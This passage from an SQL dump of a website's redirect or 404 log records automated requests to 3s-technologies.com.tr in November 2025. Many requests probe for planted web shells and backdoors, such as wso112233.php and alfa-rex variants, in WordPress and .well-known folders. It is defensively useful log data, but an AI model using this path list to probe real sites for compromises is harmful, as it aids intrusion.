00:00:00',301),(49726,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll-2/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:23','0000-00-00 00:00:00',301),(49727,'http://3s-technologies.com.tr/wp-content/plugins/wordpress3cll-2/up.php',NULL,'','',1,0,'2025-11-21 19:47:24','0000-00-00 00:00:00',301),(49728,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll-2/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:25','0000-00-00 00:00:00',301),(49729,'http://3s-technologies.com.tr/wp-content/plugins/wordpresss3cll-2/up.php',NULL,'','',1,0,'2025-11-21 19:47:26','0000-00-00 00:00:00',301),(49730,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll-2/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:27','0000-00-00 00:00:00',301),(49731,'http://3s-technologies.com.tr/tr/neshe',NULL,'','',5,0,'2025-11-22 02:01:59','0000-00-00 00:00:00',301),(49732,'http://3s-technologies.com.tr/tr/xpow0b.php',NULL,'','',1,0,'2025-11-22 02:02:00','0000-00-00 00:00:00',301),(49733,'http://3s-technologies.com.tr/tr/xpobv.php',NULL,'','',1,0,'2025-11-22 02:02:01','0000-00-00 00:00:00',301),(49734,'http://3s-technologies.com.tr/tr/xmailer.php',NULL,'','',1,0,'2025-11-22 02:02:02','0000-00-00 00:00:00',301),(49735,'http://3s-technologies.com.tr/tr/testo.php',NULL,'','',3,0,'2025-11-22 02:02:04','0000-00-00 00:00:00',301),(49736,'http://3s-technologies.com.tr/tr/saxzw9t.php',NULL,'','',3,0,'2025-11-22 02:02:06','0000-00-00 00:00:00',301),(49737,'http://3s-technologies.com.tr/tr/saxzgf5.php',NULL,'','',3,0,'2025-11-22 02:02:06','0000-00-00 00:00:00',301),(49738,'http://3s-technologies.com.tr/tr/psh.php',NULL,'','',1,0,'2025-11-22 02:02:07','0000-00-00 00:00:00',301),(49739,'http://3s-technologies.com.tr/tr/klwc.php',NULL,'','',1,0,'2025-11-22 02:02:09','0000-00-00 00:00:00',301),(49740,'http://3s-technologies.com.tr/tr/klbnm.php',NULL,'','',1,0,'2025-11-22 02:02:10','0000-00-00 00:00:00',301),(49741,'http://3s-technologies.com.tr/tr/indo.php/qa.php',NULL,'','',1,0,'2025-11-22 02:02:21','0000-00-00 00:00:00',301),(49742,'http://3s-technologies.com.tr/tr/well-known/acme-challenge/index.php',NULL,'','',1,0,'2025-11-22 02:02:22','0000-00-00 00:00:00',301),(49743,'http://3s-technologies.com.tr/tr/well-known/index.php',NULL,'','',1,0,'2025-11-22 02:02:28','0000-00-00 00:00:00',301),(49744,'http://3s-technologies.com.tr/tr/well-known/acme-challenge/la.php',NULL,'','',1,0,'2025-11-22 02:02:28','0000-00-00 00:00:00',301),(49745,'http://mail.3s-technologies.com.tr/tr/zc-729.php',NULL,'','',1,0,'2025-11-22 15:16:58','0000-00-00 00:00:00',301),(49746,'http://mail.3s-technologies.com.tr/tr/muscovadite.php',NULL,'','',1,0,'2025-11-22 15:17:04','0000-00-00 00:00:00',301),(49747,'http://mail.3s-technologies.com.tr/tr/nonesoterically.php',NULL,'','',1,0,'2025-11-22 15:17:06','0000-00-00 00:00:00',301),(49748,'http://mail.3s-technologies.com.tr/tr/yuk.php',NULL,'','',1,0,'2025-11-22 15:17:07','0000-00-00 00:00:00',301),(49749,'http://mail.3s-technologies.com.tr/tr/contrller.php',NULL,'','',2,0,'2025-11-22 15:17:08','0000-00-00 00:00:00',301),(49750,'http://mail.3s-technologies.com.tr/tr/starry.php',NULL,'','',1,0,'2025-11-22 15:17:08','0000-00-00 00:00:00',301),(49751,'http://mail.3s-technologies.com.tr/tr/byp7.php',NULL,'','',2,0,'2025-11-22 15:17:11','0000-00-00 00:00:00',301),(49752,'http://mail.3s-technologies.com.tr/tr/unwattled.php',NULL,'','',1,0,'2025-11-22 15:17:14','0000-00-00 00:00:00',301),(49753,'http://mail.3s-technologies.com.tr/tr/ww1.php',NULL,'','',18,0,'2025-11-22 15:17:15','0000-00-00 00:00:00',301),(49754,'http://mail.3s-technologies.com.tr/tr/wp-blog-front.php',NULL,'','',1,0,'2025-11-22 15:17:16','0000-00-00 00:00:00',301),(49755,'http://mail.3s-technologies.com.tr/tr/diesinker.php',NULL,'','',1,0,'2025-11-22 15:17:20','0000-00-00 00:00:00',301),(49756,'http://mail.3s-technologies.com.tr/tr/dinah.php',NULL,'','',1,0,'2025-11-22 15:17:21','0000-00-00 00:00:00',301),(49757,'http://mail.3s-technologies.com.tr/tr/washland.php',NULL,'','',1,0,'2025-11-22 15:17:22','0000-00-00 00:00:00',301),(49758,'http://mail.3s-technologies.com.tr/tr/prototheria.php',NULL,'','',1,0,'2025-11-22 15:17:23','0000-00-00 00:00:00',301),(49759,'http://mail.3s-technologies.com.tr/tr/microspore.php',NULL,'','',1,0,'2025-11-22 15:17:24','0000-00-00 00:00:00',301),(49760,'http://mail.3s-technologies.com.tr/tr/wpc2.php',NULL,'','',2,0,'2025-11-22 15:17:26','0000-00-00 00:00:00',301),(49761,'http://mail.3s-technologies.com.tr/tr/speculative.php',NULL,'','',1,0,'2025-11-22 15:17:28','0000-00-00 00:00:00',301),(49762,'http://mail.3s-technologies.com.tr/tr/acholuria.php',NULL,'','',1,0,'2025-11-22 15:17:31','0000-00-00 00:00:00',301),(49763,'http://mail.3s-technologies.com.tr/tr/ghreshttryu.php',NULL,'','',1,0,'2025-11-22 15:17:35','0000-00-00 00:00:00',301),(49764,'http://mail.3s-technologies.com.tr/tr/aporrhiegma.php',NULL,'','',1,0,'2025-11-22 15:17:36','0000-00-00 00:00:00',301),(49765,'http://mail.3s-technologies.com.tr/tr/byp8.php',NULL,'','',17,0,'2025-11-22 15:17:37','0000-00-00 00:00:00',301),(49766,'http://mail.3s-technologies.com.tr/tr/clss.php',NULL,'','',12,0,'2025-11-22 15:17:38','0000-00-00 00:00:00',301),(49767,'http://mail.3s-technologies.com.tr/tr/qaez.php56',NULL,'','',1,0,'2025-11-22 15:17:39','0000-00-00 00:00:00',301),(49768,'http://mail.3s-technologies.com.tr/tr/lanbai.php',NULL,'','',1,0,'2025-11-22 15:17:40','0000-00-00 00:00:00',301),(49769,'http://mail.3s-technologies.com.tr/tr/cord.php',NULL,'','',1,0,'2025-11-22 15:17:41','0000-00-00 00:00:00',301),(49770,'http://mail.3s-technologies.com.tr/tr/xl6.php',NULL,'','',1,0,'2025-11-22 15:17:42','0000-00-00 00:00:00',301),(49771,'http://mail.3s-technologies.com.tr/tr/domains.php',NULL,'','',19,0,'2025-11-22 15:17:44','0000-00-00 00:00:00',301),(49772,'http://mail.3s-technologies.com.tr/tr/boyfile.php',NULL,'','',1,0,'2025-11-22 15:17:46','0000-00-00 00:00:00',301),(49773,'http://mail.3s-technologies.com.tr/tr/atex1.php',NULL,'','',1,0,'2025-11-22 15:17:47','0000-00-00 00:00:00',301),(49774,'http://mail.3s-technologies.com.tr/tr/attaining.php',NULL,'','',1,0,'2025-11-22 15:17:48','0000-00-00 00:00:00',301),(49775,'http://mail.3s-technologies.com.tr/tr/bunnies.php?p=',NULL,'','',1,0,'2025-11-22 15:17:49','0000-00-00 00:00:00',301),(49776,'http://mail.3s-technologies.com.tr/tr/frenchwomen.php',NULL,'','',1,0,'2025-11-22 15:17:50','0000-00-00 00:00:00',301),(49777,'http://mail.3s-technologies.com.tr/tr/glucosidase.php',NULL,'','',1,0,'2025-11-22 15:17:51','0000-00-00 00:00:00',301),(49778,'http://mail.3s-technologies.com.tr/tr/modernize.php',NULL,'','',1,0,'2025-11-22 15:17:52','0000-00-00 00:00:00',301),(49779,'http://mail.3s-technologies.com.tr/tr/twohandedness.php',NULL,'','',1,0,'2025-11-22 15:17:53','0000-00-00 00:00:00',301),(49780,'http://mail.3s-technologies.com.tr/tr/undigitated.php',NULL,'','',1,0,'2025-11-22 15:17:54','0000-00-00 00:00:00',301),(49781,'http://mail.3s-technologies.com.tr/tr/unsafer.php',NULL,'','',1,0,'2025-11-22 15:17:55','0000-00-00 00:00:00',301),(49782,'http://mail.3s-technologies.com.tr/tr/unbalanceable.php',NULL,'','',1,0,'2025-11-22 15:17:57','0000-00-00 00:00:00',301),(49783,'http://mail.3s-technologies.com.tr/tr/wp-advaced.php',NULL,'','',1,0,'2025-11-22 15:17:58','0000-00-00 00:00:00',301),(49784,'http://mail.3s-technologies.com.tr/tr/wp-securitiy.php',NULL,'','',1,0,'2025-11-22 15:17:59','0000-00-00 00:00:00',301),(49785,'http://mail.3s-technologies.com.tr/tr/poliomyelopathy.php',NULL,'','',1,0,'2025-11-22 15:18:00','0000-00-00 00:00:00',301),(49786,'http://mail.3s-technologies.com.tr/tr/wp-class.php',NULL,'','',14,0,'2025-11-22 18:30:12','0000-00-00 00:00:00',301),(49787,'http://mail.3s-technologies.com.tr/tr/xl.php',NULL,'','',7,0,'2025-11-22 18:30:37','0000-00-00 00:00:00',301),(49788,'http://mail.3s-technologies.com.tr/tr/wp-logiin.php',NULL,'','',1,0,'2025-11-22 18:30:48','0000-00-00 00:00:00',301),(49789,'http://3s-technologies.com.tr/en/.well-known/index.php',NULL,'https://www.bing.com/','',64,0,'2025-11-23 06:16:22','0000-00-00 00:00:00',301),(49790,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/index.php',NULL,'https://www.google.com/','',15,0,'2025-11-23 06:16:23','0000-00-00 00:00:00',301),(49791,'http://3s-technologies.com.tr/en/wp-includes/requests/text/admin.php',NULL,'https://www.google.com/','',2,0,'2025-11-23 06:16:25','0000-00-00 00:00:00',301),(49792,'http://3s-technologies.com.tr/en/.well-known/wso112233.php',NULL,'https://www.yahoo.com/','',2,0,'2025-11-23 06:16:25','0000-00-00 00:00:00',301),(49793,'http://3s-technologies.com.tr/en/.well-knownold/wso112233.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:27','0000-00-00 00:00:00',301),(49794,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wso112233.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:28','0000-00-00 00:00:00',301),(49795,'http://3s-technologies.com.tr/en/.well-known/pkivalidation/wso112233.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:16:29','0000-00-00 00:00:00',301),(49796,'http://3s-technologies.com.tr/en/wp-content/plugins/wso112233.php',NULL,'https://www.google.de/','',1,0,'2025-11-23 06:16:30','0000-00-00 00:00:00',301),(49797,'http://3s-technologies.com.tr/en/wp-content/uploads/wso112233.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:16:31','0000-00-00 00:00:00',301),(49798,'http://3s-technologies.com.tr/en/wp-content/themes/wso112233.php',NULL,'https://www.yahoo.com/','',1,0,'2025-11-23 06:16:33','0000-00-00 00:00:00',301),(49799,'http://3s-technologies.com.tr/en/.well-known/shell20211028.php',NULL,'https://www.google.com/','',1,0,'2025-11-23 06:16:34','0000-00-00 00:00:00',301),(49800,'http://3s-technologies.com.tr/en/.well-knownold/shell20211028.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:36','0000-00-00 00:00:00',301),(49801,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/shell20211028.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:16:36','0000-00-00 00:00:00',301),(49802,'http://3s-technologies.com.tr/en/.well-known/pkivalidation/shell20211028.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-23 06:16:37','0000-00-00 00:00:00',301),(49803,'http://3s-technologies.com.tr/en/wp-content/plugins/shell20211028.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:38','0000-00-00 00:00:00',301),(49804,'http://3s-technologies.com.tr/en/wp-content/uploads/shell20211028.php',NULL,'https://www.google.com/','',2,0,'2025-11-23 06:16:39','0000-00-00 00:00:00',301),(49805,'http://3s-technologies.com.tr/en/wp-content/themes/shell20211028.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:16:42','0000-00-00 00:00:00',301),(49806,'http://3s-technologies.com.tr/en/.well-known/bala.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:43','0000-00-00 00:00:00',301),(49807,'http://3s-technologies.com.tr/en/.well-knownold/bala.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:16:45','0000-00-00 00:00:00',301),(49808,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/bala.php',NULL,'https://www.google.com/','',1,0,'2025-11-23 06:16:45','0000-00-00 00:00:00',301),(49809,'http://3s-technologies.com.tr/en/.well-known/pkivalidation/bala.php',NULL,'https://www.google.com/','',1,0,'2025-11-23 06:16:46','0000-00-00 00:00:00',301),(49810,'http://3s-technologies.com.tr/en/wp-content/plugins/bala.php',NULL,'https://www.bing.com/','',1,0,'2025-11-23 06:16:47','0000-00-00 00:00:00',301),(49811,'http://3s-technologies.com.tr/en/wp-content/uploads/bala.php',NULL,'https://www.google.com/','',1,0,'2025-11-23 06:16:48','0000-00-00 00:00:00',301),(49812,'http://3s-technologies.com.tr/en/wp-content/themes/bala.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:16:51','0000-00-00 00:00:00',301),(49813,'http://3s-technologies.com.tr/en/wp-content/dropdown.php',NULL,'https://www.google.co.uk/','',3,0,'2025-11-23 06:16:52','0000-00-00 00:00:00',301),(49814,'http://3s-technologies.com.tr/en/wp-includes/dropdown.php',NULL,'https://duckduckgo.com/','',3,0,'2025-11-23 06:16:53','0000-00-00 00:00:00',301),(49815,'http://3s-technologies.com.tr/en/wp-admin/dropdown.php',NULL,'https://duckduckgo.com/','',3,0,'2025-11-23 06:16:54','0000-00-00 00:00:00',301),(49816,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/about.php7',NULL,'https://www.google.de/','',1,0,'2025-11-23 06:16:57','0000-00-00 00:00:00',301),(49817,'http://3s-technologies.com.tr/en/wp-p.php7',NULL,'https://www.google.co.uk/','',1,0,'2025-11-23 06:16:58','0000-00-00 00:00:00',301),(49818,'http://3s-technologies.com.tr/en/wsoyanz.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:17:01','0000-00-00 00:00:00',301),(49819,'http://3s-technologies.com.tr/en/wp-admin/js/about.php',NULL,'https://www.google.com/','',5,0,'2025-11-23 06:17:03','0000-00-00 00:00:00',301),(49820,'http://3s-technologies.com.tr/en/wp-content/plugins/seoo/wsoyanz.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:17:04','0000-00-00 00:00:00',301),(49821,'http://3s-technologies.com.tr/en/wp-content/plugins/seoo/wsoyanz1.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:17:05','0000-00-00 00:00:00',301),(49822,'http://3s-technologies.com.tr/en/cache-compat.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-23 06:17:05','0000-00-00 00:00:00',301),(49823,'http://3s-technologies.com.tr/en/ajax-actions.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-23 06:17:06','0000-00-00 00:00:00',301),(49824,'http://3s-technologies.com.tr/en/wp-admin/ajax-actions.php',NULL,'https://www.google.de/','',1,0,'2025-11-23 06:17:07','0000-00-00 00:00:00',301),(49825,'http://3s-technologies.com.tr/en/wp-consar.php',NULL,'https://www.google.fr/','',1,0,'2025-11-23 06:17:08','0000-00-00 00:00:00',301),(49826,'http://3s-technologies.com.tr/en/admin-post.php',NULL,'https://www.yahoo.com/','',3,0,'2025-11-23 06:17:10','0000-00-00 00:00:00',301),(49827,'http://3s-technologies.com.tr/en/wp-admin/maint/maint/ajax-actions.php',NULL,'https://www.bing.com/','',1,0,'2025-11-23 06:17:10','0000-00-00 00:00:00',301),(49828,'http://3s-technologies.com.tr/en/about.php7',NULL,'https://www.google.de/','',4,0,'2025-11-23 06:17:13','0000-00-00 00:00:00',301),(49829,'http://3s-technologies.com.tr/en/ebs.php7',NULL,'https://www.google.de/','',1,0,'2025-11-23 06:17:16','0000-00-00 00:00:00',301),(49830,'http://3s-technologies.com.tr/en/ws.php7',NULL,'https://www.google.com/','',1,0,'2025-11-23 06:17:16','0000-00-00 00:00:00',301),(49831,'http://3s-technologies.com.tr/en/alfanew2.php7',NULL,'https://www.yahoo.com/','',1,0,'2025-11-23 06:17:17','0000-00-00 00:00:00',301),(49832,'http://3s-technologies.com.tr/en/alfa-rex2.php7',NULL,'https://www.google.de/','',1,0,'2025-11-23 06:17:18','0000-00-00 00:00:00',301),(49833,'http://3s-technologies.com.tr/en/ioxi-rex4.php7',NULL,'https://www.yahoo.com/','',3,0,'2025-11-23 06:17:19','0000-00-00 00:00:00',301),(49834,'http://3s-technologies.com.tr/en/wp-content/plugins/seoo/alfa-ioxi.php',NULL,'https://www.google.com/','',3,0,'2025-11-23 06:17:19','0000-00-00 00:00:00',301),(49835,'http://3s-technologies.com.tr/en/wp-content/plugins/classic-editor/wp-login.php',NULL,'https://duckduckgo.com/','',15,0,'2025-11-23 06:17:20','0000-00-00 00:00:00',301),(49836,'http://www.3s-technologies.com.tr/tr/style.php',NULL,'','',6,0,'2025-11-23 08:10:08','0000-00-00 00:00:00',301),(49837,'https://www.3s-technologies.com.tr/tr/.netlify/images?url=',NULL,'https://www.3s-technologies.com.tr/.netlify/images?url=','',1,0,'2025-11-23 23:19:51','0000-00-00 00:00:00',301),(49838,'http://3s-technologies.com.tr/tr/xenium4.php',NULL,'','',15,0,'2025-11-24 10:35:27','0000-00-00 00:00:00',301),(49839,'http://3s-technologies.com.tr/tr/disaos.php',NULL,'','',5,0,'2025-11-24 10:35:32','0000-00-00 00:00:00',301),(49840,'http://3s-technologies.com.tr/tr/kr.php',NULL,'','',6,0,'2025-11-24 10:35:36','0000-00-00 00:00:00',301),(49841,'http://3s-technologies.com.tr/tr/chati.php',NULL,'','',3,0,'2025-11-24 10:35:38','0000-00-00 00:00:00',301),(49842,'http://3s-technologies.com.tr/tr/content-over.php',NULL,'','',3,0,'2025-11-24 10:35:38','0000-00-00 00:00:00',301),(49843,'http://3s-technologies.com.tr/tr/rsjlrria.php',NULL,'','',3,0,'2025-11-24 10:35:42','0000-00-00 00:00:00',301),(49844,'http://3s-technologies.com.tr/tr/gec.php',NULL,'','',14,0,'2025-11-24 10:35:43','0000-00-00 00:00:00',301),(49845,'http://3s-technologies.com.tr/tr/update/gec.php',NULL,'','',3,0,'2025-11-24 10:35:44','0000-00-00 00:00:00',301),(49846,'http://3s-technologies.com.tr/tr/nfu.php',NULL,'','',6,0,'2025-11-24 10:35:44','0000-00-00 00:00:00',301),(49847,'http://3s-technologies.com.tr/tr/update/nfu.php',NULL,'','',3,0,'2025-11-24 10:35:45','0000-00-00 00:00:00',301),(49848,'http://3s-technologies.com.tr/tr/xl8.php',NULL,'','',3,0,'2025-11-24 10:35:46','0000-00-00 00:00:00',301),(49849,'http://3s-technologies.com.tr/tr/zc-706.php',NULL,'','',3,0,'2025-11-24 10:35:48','0000-00-00 00:00:00',301),(49850,'http://3s-technologies.com.tr/tr/e56.php',NULL,'','',3,0,'2025-11-24 10:35:51','0000-00-00 00:00:00',301),(49851,'http://3s-technologies.com.tr/tr/wp-x.php',NULL,'','',5,0,'2025-11-24 10:35:51','0000-00-00 00:00:00',301),(49852,'http://3s-technologies.com.tr/tr/tarc.php',NULL,'','',1,0,'2025-11-24 17:02:39','0000-00-00 00:00:00',301),(49853,'http://3s-technologies.com.tr/tr/ed35f.php',NULL,'','',1,0,'2025-11-24 17:02:40','0000-00-00 00:00:00',301),(49854,'http://3s-technologies.com.tr/tr/ula.php',NULL,'','',3,0,'2025-11-24 17:02:41','0000-00-00 00:00:00',301),(49855,'http://3s-technologies.com.tr/tr/c451f.php',NULL,'','',1,0,'2025-11-24 17:02:42','0000-00-00 00:00:00',301),(49856,'http://3s-technologies.com.tr/tr/efa4f.php',NULL,'','',1,0,'2025-11-24 17:02:43','0000-00-00 00:00:00',301),(49857,'http://3s-technologies.com.tr/tr/suy.php',NULL,'','',3,0,'2025-11-24 17:02:44','0000-00-00 00:00:00',301),(49858,'http://3s-technologies.com.tr/tr/nbr.php',NULL,'','',1,0,'2025-11-24 17:02:45','0000-00-00 00:00:00',301),(49859,'http://3s-technologies.com.tr/tr/poj.php',NULL,'','',1,0,'2025-11-24 17:02:51','0000-00-00 00:00:00',301),(49860,'http://3s-technologies.com.tr/tr/haf.php',NULL,'','',3,0,'2025-11-24 17:02:53','0000-00-00 00:00:00',301),(49861,'http://3s-technologies.com.tr/tr/sow.php',NULL,'','',3,0,'2025-11-24 17:02:54','0000-00-00 00:00:00',301),(49862,'http://3s-technologies.com.tr/tr/tro.php',NULL,'','',3,0,'2025-11-24 17:02:55','0000-00-00 00:00:00',301),(49863,'http://3s-technologies.com.tr/tr/kla.php',NULL,'','',1,0,'2025-11-24 17:03:08','0000-00-00 00:00:00',301),(49864,'http://3s-technologies.com.tr/tr/installation_old/index.php',NULL,'','',1,0,'2025-11-24 19:18:00','0000-00-00 00:00:00',301),(49865,'http://3s-technologies.com.tr/tr/wp-logiin.php',NULL,'','',1,0,'2025-11-24 23:52:36','0000-00-00 00:00:00',301),(49866,'http://3s-technologies.com.tr/tr/wp-content/plugins/google-seo-rank/index.php',NULL,'','',1,0,'2025-11-25 07:26:04','0000-00-00 00:00:00',301),(49867,'http://3s-technologies.com.tr/tr/f8moue.php',NULL,'','',3,0,'2025-11-25 11:54:03','0000-00-00 00:00:00',301),(49868,'http://3s-technologies.com.tr/tr/palsy.php',NULL,'','',3,0,'2025-11-25 11:54:07','0000-00-00 00:00:00',301),(49869,'http://3s-technologies.com.tr/tr/vanda.php',NULL,'','',22,0,'2025-11-25 11:54:08','0000-00-00 00:00:00',301),(49870,'http://3s-technologies.com.tr/tr/asciferous.php',NULL,'','',3,0,'2025-11-25 11:54:09','0000-00-00 00:00:00',301),(49871,'http://3s-technologies.com.tr/tr/coenoecic.php',NULL,'','',3,0,'2025-11-25 11:54:11','0000-00-00 00:00:00',301),(49872,'http://3s-technologies.com.tr/tr/cyanamids.php',NULL,'','',3,0,'2025-11-25 11:54:12','0000-00-00 00:00:00',301),(49873,'http://3s-technologies.com.tr/tr/disengaging.php',NULL,'','',3,0,'2025-11-25 11:54:13','0000-00-00 00:00:00',301),(49874,'http://3s-technologies.com.tr/tr/disquiet.php',NULL,'','',3,0,'2025-11-25 11:54:14','0000-00-00 00:00:00',301),(49875,'http://3s-technologies.com.tr/tr/duplicand.php',NULL,'','',3,0,'2025-11-25 11:54:15','0000-00-00 00:00:00',301),(49876,'http://3s-technologies.com.tr/tr/parturiency.php',NULL,'','',3,0,'2025-11-25 11:54:16','0000-00-00 00:00:00',301),(49877,'http://3s-technologies.com.tr/tr/tithings.php',NULL,'','',3,0,'2025-11-25 11:54:17','0000-00-00 00:00:00',301),(49878,'http://3s-technologies.com.tr/tr/z60.php',NULL,'','',52,0,'2025-11-25 11:54:19','0000-00-00 00:00:00',301),(49879,'http://3s-technologies.com.tr/tr/wp-themes.php',NULL,'','',10,0,'2025-11-25 11:54:20','0000-00-00 00:00:00',301),(49880,'http://3s-technologies.com.tr/tr/edd.php',NULL,'','',3,0,'2025-11-25 11:54:21','0000-00-00 00:00:00',301),(49881,'http://3s-technologies.com.tr/tr/bo.php',NULL,'','',25,0,'2025-11-25 11:54:22','0000-00-00 00:00:00',301),(49882,'http://3s-technologies.com.tr/tr/bn.php',NULL,'','',3,0,'2025-11-25 11:54:23','0000-00-00 00:00:00',301),(49883,'http://3s-technologies.com.tr/tr/fishmen.php',NULL,'','',3,0,'2025-11-25 11:54:26','0000-00-00 00:00:00',301),(49884,'http://3s-technologies.com.tr/tr/obfuscous.php',NULL,'','',3,0,'2025-11-25 11:54:27','0000-00-00 00:00:00',301),(49885,'http://3s-technologies.com.tr/tr/oitava.php',NULL,'','',3,0,'2025-11-25 11:54:28','0000-00-00 00:00:00',301),(49886,'http://3s-technologies.com.tr/tr/phrensying.php',NULL,'','',3,0,'2025-11-25 11:54:29','0000-00-00 00:00:00',301),(49887,'http://3s-technologies.com.tr/tr/pyrometry.php',NULL,'','',3,0,'2025-11-25 11:54:30','0000-00-00 00:00:00',301),(49888,'http://3s-technologies.com.tr/tr/unprecipitously.php',NULL,'','',3,0,'2025-11-25 11:54:31','0000-00-00 00:00:00',301),(49889,'http://3s-technologies.com.tr/tr/unbefittingly.php',NULL,'','',3,0,'2025-11-25 11:54:32','0000-00-00 00:00:00',301),(49890,'http://3s-technologies.com.tr/tr/wp-home.php',NULL,'','',5,0,'2025-11-25 11:54:34','0000-00-00 00:00:00',301),(49891,'http://3s-technologies.com.tr/tr/wp-securitiy.php',NULL,'','',5,0,'2025-11-25 11:54:34','0000-00-00 00:00:00',301),(49892,'http://3s-technologies.com.tr/tr/wp-ac.php',NULL,'','',7,0,'2025-11-25 11:54:36','0000-00-00 00:00:00',301),(49893,'http://3s-technologies.com.tr/tr/nof.php',NULL,'','',3,0,'2025-11-25 11:54:37','0000-00-00 00:00:00',301),(49894,'http://3s-technologies.com.tr/tr/unbalanceable.php',NULL,'','',3,0,'2025-11-25 11:54:40','0000-00-00 00:00:00',301),(49895,'http://3s-technologies.com.tr/tr/wp-advaced.php',NULL,'','',5,0,'2025-11-25 11:54:42','0000-00-00 00:00:00',301),(49896,'http://3s-technologies.com.tr/tr/poliomyelopathy.php',NULL,'','',3,0,'2025-11-25 11:54:43','0000-00-00 00:00:00',301),(49897,'http://3s-technologies.com.tr/en/cgi-bin/bypass.php',NULL,'https://duckduckgo.com/','',1,0,'2025-11-26 08:21:22','0000-00-00 00:00:00',301),(49898,'http://3s-technologies.com.tr/en/wp-admin/admin-ajax.php',NULL,'https://www.yahoo.com/','',4,0,'2025-11-26 08:21:28','0000-00-00 00:00:00',301),(49899,'http://3s-technologies.com.tr/en/api.php',NULL,'https://www.google.de/','',62,0,'2025-11-26 08:21:30','0000-00-00 00:00:00',301),(49900,'http://3s-technologies.com.tr/en/cgi-bin/xmrlpc.php',NULL,'https://www.google.co.uk/','',2,0,'2025-11-26 08:21:30','0000-00-00 00:00:00',301),(49901,'http://3s-technologies.com.tr/en/php.php',NULL,'https://www.google.co.uk/','',39,0,'2025-11-26 08:21:32','0000-00-00 00:00:00',301),(49902,'http://3s-technologies.com.tr/en/fonts/database.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:21:39','0000-00-00 00:00:00',301),(49903,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'https://www.bing.com/','',3,0,'2025-11-26 08:21:43','0000-00-00 00:00:00',301),(49904,'http://3s-technologies.com.tr/en/assets/atomlib.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:22:03','0000-00-00 00:00:00',301),(49905,'http://3s-technologies.com.tr/en/autoload_classmap/function.php',NULL,'https://www.yahoo.com/','',109,0,'2025-11-26 08:22:05','0000-00-00 00:00:00',301),(49906,'http://3s-technologies.com.tr/en/backup.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:22:06','0000-00-00 00:00:00',301),(49907,'http://3s-technologies.com.tr/en/browse.php',NULL,'https://www.yahoo.com/','',13,0,'2025-11-26 08:22:07','0000-00-00 00:00:00',301),(49908,'http://3s-technologies.com.tr/en/cc.php',NULL,'https://www.google.de/','',36,0,'2025-11-26 08:22:09','0000-00-00 00:00:00',301),(49909,'http://3s-technologies.com.tr/en/cgi-bin/file.php',NULL,'https://www.google.com/','',7,0,'2025-11-26 08:22:11','0000-00-00 00:00:00',301),(49910,'http://3s-technologies.com.tr/en/f35.php',NULL,'https://www.google.fr/','',2,0,'2025-11-26 08:22:19','0000-00-00 00:00:00',301),(49911,'http://3s-technologies.com.tr/en/fi2.php',NULL,'https://www.google.de/','',1,0,'2025-11-26 08:22:20','0000-00-00 00:00:00',301),(49912,'http://3s-technologies.com.tr/en/gebase.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-26 08:22:23','0000-00-00 00:00:00',301),(49913,'http://3s-technologies.com.tr/en/newfile.php',NULL,'https://www.google.fr/','',29,0,'2025-11-26 08:22:32','0000-00-00 00:00:00',301),(49914,'http://3s-technologies.com.tr/en/wp-admin/autoload_classmap.php',NULL,'https://www.google.fr/','',12,0,'2025-11-26 08:22:37','0000-00-00 00:00:00',301),(49915,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/atomlib.php',NULL,'https://duckduckgo.com/','',17,0,'2025-11-26 08:22:37','0000-00-00 00:00:00',301),(49916,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight',NULL,'https://duckduckgo.com/','',25,0,'2025-11-26 08:22:39','0000-00-00 00:00:00',301),(49917,'http://3s-technologies.com.tr/en/wp-admin/function.php',NULL,'https://www.google.com/','',3,0,'2025-11-26 08:22:40','0000-00-00 00:00:00',301),(49918,'http://3s-technologies.com.tr/en/wp-admin/images/index.php',NULL,'https://duckduckgo.com/','',52,0,'2025-11-26 08:22:40','0000-00-00 00:00:00',301),(49919,'http://3s-technologies.com.tr/en/wp-admin/js',NULL,'https://duckduckgo.com/','',114,0,'2025-11-26 08:22:42','0000-00-00 00:00:00',301),(49920,'http://3s-technologies.com.tr/en/wp-admin/js/autoload_classmap.php',NULL,'https://www.google.co.uk/','',44,0,'2025-11-26 08:22:43','0000-00-00 00:00:00',301),(49921,'http://3s-technologies.com.tr/en/wp-admin/js/index.php',NULL,'https://www.google.com/','',88,0,'2025-11-26 08:22:44','0000-00-00 00:00:00',301),(49922,'http://3s-technologies.com.tr/en/wp-admin/js/widgets',NULL,'https://www.google.com/','',137,0,'2025-11-26 08:22:45','0000-00-00 